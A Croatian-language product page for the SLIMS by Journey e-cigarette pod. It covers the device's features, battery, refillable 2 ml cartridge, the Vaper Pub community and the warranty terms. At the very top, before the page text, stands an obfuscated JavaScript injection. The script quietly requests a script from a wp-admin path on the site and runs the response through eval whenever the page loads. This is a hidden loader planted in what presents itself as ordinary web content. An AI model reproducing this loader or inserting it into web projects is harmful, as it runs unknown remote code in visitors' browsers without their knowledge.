;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
SLIMS e cigareta

SLIMS by Journey

Došli ste na ovaj dio stranice čitajuči članke, skeniranjem QR koda na pozivnici SLIMS uređaja ili surfajući internetom – kako god bilo – dobrodošli!

Prije svega se želimo zahvaliti na povjerenju i podršci svih naših kupaca i članova Vaper Pub zajednice, to nam izuzetno puno znači. Takav support nam govori da (ipak) nešto radimo kako treba :)

Drugo – ukoliko ste registrirani na ovoj stranici kao korisnik SLIMS by Journey uređaja ostvarujete pravo na dodatnih 6 mjeseci garancije!
Samo, molimo vas, sačuvajte račun iz trgovine gdje ste ga kupili!

Pridružite nam se u Vaper Pubu!

Unutar zajednice komuniciramo na razne načine! Članovi zajednice su uvijek spremni uskočiti u pomoć, odgovoriti na pitanje, dati savjet, ili komentirati vaš ručak ukoliko je to predmet fotografije objave (a često puta je).

Vaper Pub je pravi “virtualni pub” za vapere gdje nismo usko vezani objavama samo za e cigarete već i za day to day događaje – koju dobru klopu ste jeli, što ste pili, što ste vidjeli.

Imamo čitavo mnoštvo načina komunikacije i stalne evente! Svaki petak je Vape Friday Night Live Stream koji se emitira na Vaper Pub Youtube kanalu (te još nekim kanalima). Svakodnevna komunikacija je najčešće putem postova/objava, live public chata ili pak u virtualnoj sobi za druženje putem Zoom aplikacije koja je upaljena 24/7! Uletite – pitajte, razgovarajte :D

Tu su i konstantne nagradne igre, kvizovi, Puff bodovi koje skupljate korištenjem stranice i kupujete stvari is vape shopa koji je dio ove stranice.

Što je SLIMS by Journey?

SLIMS by Journey je elektronska cigareta (POD). Prilikom selekcije karakteristika proizvoda oslonili smo se na naše desetogodišnje iskustvo u svijetu e cigareta te na našu jedinstvenu zajednicu kao i sve članove koji su njezin dio. Sve to iskustvo, blizak kontakt s članovima zajednice, početnicima, rad u maloprodaji, smišljanje i proizvodnja vrhunskih premium e tekućina pretočili smo u ono što SLIMS je – elektronska cigareta koja vas neće iznevjeriti u pokušaju da se odviknete od regularnih cigareta.

Journey je vrlo poznat brand u svijetu e cigareta kako u RH tako i van granica lijepe naše. Naši ručno rađeni premium okusi su obožavani u mnogim zemljama diljem Zemlje, od Afganistana, Maroka pa do Češke, Mađarske, Srbije, Slovačke, Slovenije, Italije, Grčke te mnogih drugih.

Kome je namijenjen SLIMS?

SLIMS je jedinstven utoliko što može zadovoljiti želju za jednostavnostću početnika te želju za dobrim okusom i velikim oblacima naprednog korisnika.

Ukoliko ste početnik i tek ulazite u svijet e cigareta

Ovaj uređaj će vam pružati ono što niti jedan drugi neće: najjednostavniji način uživanja u ogromnim oblacima vrhunskih premium okusa ručno rađenih tekućina koje su do sada bile rezervirane isključivo za napredne korisnike i entuzijaste.

Ukoliko ste napredni korisnik i redovno koristite naprednije uređaje

Vama je na raspolaganju punjiva SLIMS patrona – dakle patrona koja dolazi prazna i koju možete po želji puniti s bilo kojom e tekućinom. Uređaj vas apsolutno neće razočarati u situacijama kada vam je potreban “stealth” vape ili manji lagani uređaj.

Što su SLIMS-i pogledajte u ovom videu: SLIMS POD e cigareta

Koje su točno karakteristike SLIMS by Journey POD e cigarete?

Krenimo redom:

Kućište je aluminijsko, metalno. Samim time otpornije i elegantnije. Moramo napisati da je za odabir dizajna odlučio ženski dio publike i za to svaka pohvala na odličnom odabiru!

Uređaj radi u “autopilot” modu – apsolutno nema nikakve potrebe za podešavanjem, on sve radi automatski. Nema gumba za aktivaciju uređaja – dovoljno je jednostavno prisloniti usnik patrone i udahnuti paru odnosno inhalirati.

Baterija je jača nego kod dobrog dijela sličnih uređaja, u kombinaciji s vrlo štedljivim i responzivnim grijačem omogućava zahtjevnim korisniku rad i do osam sati. Naravno – koliko će baterija trajati ovisi o načinu i intenzitetu korištenja, u prosjeku traje od 6 do 8 sati intenzivnog korištenja.

Sama SLIMS POD patrona je kapaciteta 2 ml, što je ponovo i do 30% više nego što nude drugi slični brandovi. Veći kapacitet patrone = više udaha = više za vaš novac. Jedna puna patrona osigurava 300 do 350 pravih inhalacija. Dakle tu ne pričamo o puffkanju. Ta brojka može biti individualna i varira vrlo često od 300 do čak 700, sve ovisi o načinu kako korisnik koristi uređaj.

Jedna puna SLIMS patrona mijenja od prilike dvije do dvije i pol kutije cigareta.

Još jedna prednost SLIMS patrone je to što je providna i u bilo kojem momentu vidite i znate koliko vam je e tekućine još ostalo.

Logo na samom uređaju svijetli u nekoliko boja koje su indikator statusa uređaja.
Zelena boja – uređaj je u punoj funkciji
Plava boja – baterija uređaja je na 30 posto
Crvena boja – baterija uređaja je ispod 10 posto

Prilikom punjenja SLIMS logo je bijele boje i pulsira. Kada je e cigareta puna – logo konstantno svijetli bijelom bojom.

Prilikom umetanja patrone u SLIMS – logo će na kratko zasvijetliti zelenom bojom. Ukoliko se prilikom korištenja javi situacija gdje zasvijetli zeleno a zatim bijelo – nešto nije uredu s patronom.

Uređaj se puni s donje strane putem USB-C i napuni se u roku od 30-50 minuta ovisno o uvijetima i jačini punjača.

Od ostalih zanimljivih opcija su mnoge zaštite integrirane u čip koji konstantno kontrolira sustav kako ne bi morali birnuti o ničemu. Tako uređaj ima zaštitu od prepunjavanja, kratkog spoja, niskog otpora te se automatski deaktivira nakon 8 sekundi korištenja. Možete biti sigurni da se uređaj ili patrona neće pregrijati ili nešto gore.

Opcija za napredne korisnike i one koji će to tek postati

Opcija za napredne korisnike je prethodno spomenuta punjiva SLIMS patrona. Što to točno znači?

To znači da možete sami odabrati bilo koji okus dostupan u bilo kojem obliku te ga koristiti sa SLIMS POD uređajem na način da jednostavno sami ulijete e tekućinu u SLIMS POD putem ventila koji se nalazi s donje strane patrone.

Naprednim korisnicima to pruža mogućnost da koriste okuse koje god žele, dok korisnicima koji tek ulaze u svijet e cigareta otvara vrata u šarolik svijet okusa o kojima do sada nisu mogli niti sanjati.

Naravno tu ne možemo zanemariti faktor cijene gdje je daleko isplativije kupovati velika pakiranja spram onih manjih 10ml, ili patrona.

Garancija i reklamacije

Garancija na SLIMS by Journey uređaj je 6 mjeseci. Ukoliko ste član ove stranice i imate spremljen račun tada je garancija dodatnih 6 mjeseci (ukupno 12).
Ukoliko imate bilo kakvih pitanja vezana za rad uređaja ili reklamaciju možete se obratiti na email info@aeon.hr.

Choose your Reaction!
Leave a Comment